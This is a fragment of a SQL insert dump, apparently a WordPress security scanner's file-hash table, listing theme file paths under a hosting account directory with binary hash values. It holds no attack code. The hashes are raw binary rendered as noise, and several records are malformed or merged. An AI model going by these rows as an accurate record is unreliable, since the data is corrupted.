u{԰VgY~','',0,'?'),('dY:','wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pBaZ\rPG0d','OM|z(1[dn&^2d','',0,'?'),('B\'K5','wp-content/themes/twentytwentyfour/patterns/posts-1-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-1-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͡*r\'X`dL','yG?^{+Y\'1) G$','',0,'?'),('A$\\Nb VZ','wp-content/themes/twentytwentyfour/patterns/posts-3-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-3-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1g海n:<0j','24f O,2ŬdgdŋoJ1','',0,'?'),('vQڙ]6','wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d>0ÜM5ԙrS]H','\"ߔ\\kqM:_ёfu','',0,'?'),('Ʃ\nВC','wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZJA_wurp9','<Ҳ>p[g;(','',0,'?'),('|>͜lz\\u','wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1c1)2K',')e9ɬջ`9cTF<0','',0,'?'),('掸.\" <','wp-content/themes/twentytwentyfour/patterns/posts-list.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͝g}pT^','ۡ(rN2v i[H','',0,'?'),('я7\r\'x','wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o(XVM^@\'',']2MGt[s~Ms!(BhV4','',0,'?'),('y<~6Z','wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɂq s-A>^|U','rA~ׯ_,\Zz\0}|','',0,'?'),('~zrp ;8+ٲ','wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jZ҇9F','PQ\0Lbҝ#\0m`%9Q~.?H','',0,'?'),('h**镂F','wp-content/themes/twentytwentyfour/patterns/template-home-business.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-home-business.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\r\ZYb',':DG4Tנ7=R)19A','',0,'?'),('/yCp','wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x h=\"v','QǥX 4usYVƅ:','',0,'?'),('^{[b#$Xs','wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Axk','ҠΟ.]b*)b3','',0,'?'),('*Lb Nf7','wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E$cһ','OL`쳼\']\'ѩ&Y\\\n','',0,'?'),('s\r\'n=@','wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٷhX8-C','PrFd{?ZS2t\r','',0,'?'),('Q}i)s>%Uu','wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!g+SȲlp#F','r49KPe6Z G0^d/','',0,'?'),('}Hp+Uڂ','wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rgj','}2EBGr+-y5j6~+֚(','',0,'?'),('}AûyE 2h8','wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gg~89e','뎓\"J3mwB>o(ŀ','',0,'?'),('}BqQo@l\"','wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';.+텕!;',']?Gnς','wp-content/themes/twentytwentyfour/patterns/text-faq.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x?ضcB\n.X݌','ϣd#[?z31j\\$k[gC6G','',0,'?'),('&jl\"9#ꮛNb','wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c>>_}Ob[','','[.<Բ;mPhPCl ť ','',0,'?'),('iA$7S2{V=','wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'ܣZ^;z3M','xyV%q(5cI{ -@O','',0,'?'),('D: DAXC','wp-content/themes/twentytwentyfour/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZFۓtXiO','?7`7V\r%C5\"M','',0,'?'),('ĥdI xh','wp-content/themes/twentytwentyfour/screenshot.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tK-','\\M muD=Ҷ$/{7','',0,'?'),('=`G`ǒv;','wp-content/themes/twentytwentyfour/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*/YJ)','Q,R7Ⱦ\r\"_81','',0,'?'),('J/kA滯','wp-content/themes/twentytwentyfour/styles/ember.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/ember.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iE)#^XJ','iP\nEp%ƀbI~ǮI$','',0,'?'),('\ri(#Fz','wp-content/themes/twentytwentyfour/styles/fossil.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/fossil.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\0`27=','7&响K TU]qb,\rJ','',0,'?'),('51 {FE}x8','wp-content/themes/twentytwentyfour/styles/ice.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/ice.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>@̶d^Y6d|','\\BJ i 2T@,ƥN׈?&','',0,'?'),('=Tz?}H0l\Z\"','wp-content/themes/twentytwentyfour/styles/maelstrom.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/maelstrom.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|p\rb\'DN,','nX\Z)*avAw','',0,'?'),(':k15\\','wp-content/themes/twentytwentyfour/styles/mint.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/mint.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W2Ku,]\\ ','hC ?@D>јîNfcvt','',0,'?'),('J<:\\ao-o','wp-content/themes/twentytwentyfour/styles/onyx.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/onyx.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-gHS2Œ1\Z9',':vtUޘluܗIz\"Ct ','',0,'?'),('(FTfM/w)&','wp-content/themes/twentytwentyfour/styles/rust.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/rust.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pUk 0','r:u`2?ߞdi`!9','',0,'?'),('/^\n\\?X','wp-content/themes/twentytwentyfour/templates/404.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/404.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{P.3^KY','dnђ  vѰ~|>t!','',0,'?'),('.hVoNK;c','wp-content/themes/twentytwentyfour/templates/archive.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/archive.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2;\n','OWSh9-q.h!. n%y.^Yn7','',0,'?'),('h','W$E4B,+[%H','',0,'?'),('yIyОډ','wp-content/themes/twentytwentyfour/templates/index.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˜\ZCs =','ZVLOmenw96q!c~w\"ҳw','',0,'?'),('>ƀ脴o\\iD','wp-content/themes/twentytwentyfour/templates/page-no-title.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page-no-title.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C`ۯ!2i$','^4.9,чʂGR: K','',0,'?'),('e`s̺Ʊ','wp-content/themes/twentytwentyfour/templates/page-wide.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page-wide.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%z\Za hChm','OHb^5xo\'8-mn?>','',0,'?'),('䢃hw&','wp-content/themes/twentytwentyfour/templates/page-with-sidebar.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page-with-sidebar.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\i','Xܘ3^Ȧ*bI:6UkB\\c','',0,'?'),('{#(?5%','wp-content/themes/twentytwentyfour/templates/page.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':߅;n3/','EDO\"y{O҄!clςB','',0,'?'),('G\noc$I /g9','wp-content/themes/twentytwentyfour/templates/search.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/search.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b752]D^K,z','X*M}d)ďxiKfvsY?','',0,'?'),('E ;=4 ]L[O','wp-content/themes/twentytwentyfour/templates/single-with-sidebar.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/single-with-sidebar.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','իc\r*jH','NjZví!*p\nE{+,yU','',0,'?'),('$,+KK!:$h','wp-content/themes/twentytwentyfour/templates/single.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/single.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l/HaK','KT5ئ׉g~Cv]j[Eo`','',0,'?'),('6>n@^!g','wp-content/themes/twentytwentyfour/theme.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tGoDc*','\nʼ6*\';J^Nȃ;EZ','',0,'?'),('Ԭg#٠','wp-content/themes/twentytwentyone/404.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n6Z.CA ','-cWo6\n(','',0,'?'),('[s::q+','wp-content/themes/twentytwentyone/archive.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0j23jRa&r','\n}=LFz3zң#U\"','',0,'?'),('Ƞ\" >gݠ','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`f5[֛','TwUZcF`Y[aZ','',0,'?'),('nξ8nPp\\`z','wp-content/themes/twentytwentyone/assets/css/ie-editor.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/ie-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?tq18㞸','ߌI- AV D;JRvaJ#z#','',0,'?'),('%N^ǽv7s@\n5','wp-content/themes/twentytwentyone/assets/css/ie.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FOsk%',',oDhjXw$Yǐ5v${+','',0,'?'),('7kqg>((','wp-content/themes/twentytwentyone/assets/css/print.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/%5P,`[@6','WEٺǎδUmUV\rOz','',0,'?'),(']Ɖ e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ldd#H{)b(','#MZC7eD/wfkip\\','',0,'?'),('8\no','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qN\\|>Lsx','!&to(afR#Mg{+A','',0,'?'),('lQ[1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ty\"Ys','32/ιDpnXe\0uQ\nO#G','',0,'?'),('Ryr|o>>','wp-content/themes/twentytwentyone/assets/css/style-editor.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+4raĸ<','x#Xɡ;D2GYQ%\'@H}|=.˰%','',0,'?'),('} ;1j72\r','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#0QYp˚AOe#','4dSHޘ42p⦿ו/? G1','',0,'?'),(']&A!SK>','wp-content/themes/twentytwentyone/assets/images/Reading.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/Reading.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=*| ).h','Q-:ñ1ZŴCxʞdd;Zb^','',0,'?'),('\0[|}袄D','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV@K7','7y^-\'<^?bLi=x','',0,'?'),('v*~ߏ','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%8I/CMx','W}u}vm7=EKY4','',0,'?'),('\08{e\nژx1R','',0,'?'),('-dLƥXHm','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ap!}7 Wsj','j=Xi_ְނpߤ ^Ѯ','',0,'?'),('->\"x I','wp-content/themes/twentytwentyone/assets/js/editor.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~KaOVE','wr^V[׭ H\"|iAuh,','',0,'?'),('پ[vJ_.G','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uKTS\Z55','~}۽@֖\"Jf4*Ww븺','',0,'?'),('|MWj(޻','wp-content/themes/twentytwentyone/assets/js/polyfills.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',`n:0','O]2<2\nQx}Q 78@','',0,'?'),('uI5q#,>','wp-content/themes/twentytwentyone/assets/js/primary-navigation.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dxh_)ɪ\0','eR;*IeKӯ0,YZ奡Zk%','',0,'?'),('_&Hg','wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uׂ-%?\'tJ','B ]>LZo#Q^ Vx#','',0,'?'),('ee{:\0vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qɋFm^?','}QU@xd ]n] +hhD','',0,'?'),('ݧlpS*LST$8/','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?,e\r/','j#* l\"dV5mp^ݛ$','',0,'?'),('V݀^W4-zX','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fqagD i\"','-u|5CD`磩QrG)&','',0,'?'),('sZz`xmf: ','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v]cț &','mrOzIyDzqv˘qZi','',0,'?'),('eş+\r ','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/+(7D',')vIya\"?@vpYAqJ>','',0,'?'),('qYG%B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LEyFp`','،@CB+=\Z','',0,'?'),('13\r\rIW\\','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_Jex V-\r','߬a#1Ȫs9;\0eoH߉T','',0,'?'),('RaceJT','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Iw>A\n','F \0O.Qm+vHjEodFX','',0,'?'),('W𓃚FGjUZ','wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\n+54','\\Λ;3X]3{{8ҒZ\0>\\&','',0,'?'),('|flGP.','wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"W:]`A\"e:Ս','&?~ur4Ў[z^ ','',0,'?'),('Zu=70','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':O]y\rusG','i>D4rΝ#<7r^Yi\0*zP#7','',0,'?'),('<_-|@iT','wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7UE\Z,`𫞈Ó~!',' XY8 kcTW<+F2i','',0,'?'),('UetA&R|\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Xgr~\rW','AHg[rG^kΘi<\0','',0,'?'),('P4ՓQ)zS','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MGᆻ$',' *+\0%G;_dE}u-4w\"','',0,'?'),(':TL5EFVc','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rv_`n/T','Ps\'\nBKM$꼓r fy6yݵ[e','',0,'?'),('<fÃy\0Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z.ʹˆg','\"e۰})sѓʫt[\"i/V','',0,'?'),('\not}l!E`I','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\0\\n+Ö','ƌ%{cUkw\r^p% $L`','',0,'?'),('tM&xV','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2142%F)','هOx,{e>zɁs2Cܳ','',0,'?'),('@G )7x= A','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"iqoh ?','ڴaWtĉq)N*x*q;T0','',0,'?'),('$dpC ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w2\'ud}','ƵIg\"ʧ[ r8pVgR~()','',0,'?'),('-{\nwQ^g','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Y!oh>NΔQ','_&.{#9oQzW -Y','',0,'?'),('\06uY','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q9!OiPϫ{','˿K3Ao\rwvǤ-%','',0,'?'),(';RcJ, SA','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' {\0 -xe','',0,'?'),(' *Q^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c\' [g`.Ƿ{k','{K.(\Z\0xW3\"ѿ','',0,'?'),('%?fEMs','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G߻VI','%[ kdT95|}- U$s_W{','',0,'?'),('*kum1=-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B>ToRJ','8ȼ?$[g1N4}{YKJ$C90','',0,'?'),('^27}I','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ь{O','vZd¥bNpz04\\\ZLIv','',0,'?'),('G]9e7(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>a7:ל{Zh','\"[3[@\'`$IpE.ҹS{ \"$0','',0,'?'),('^|Jʕ\Z%\"b','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i^e]M@','~\nf)Z?\"zI\\N乍','',0,'?'),('v}P`~|$7','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r2<9Ѿ_J','xShIcU9XV_r 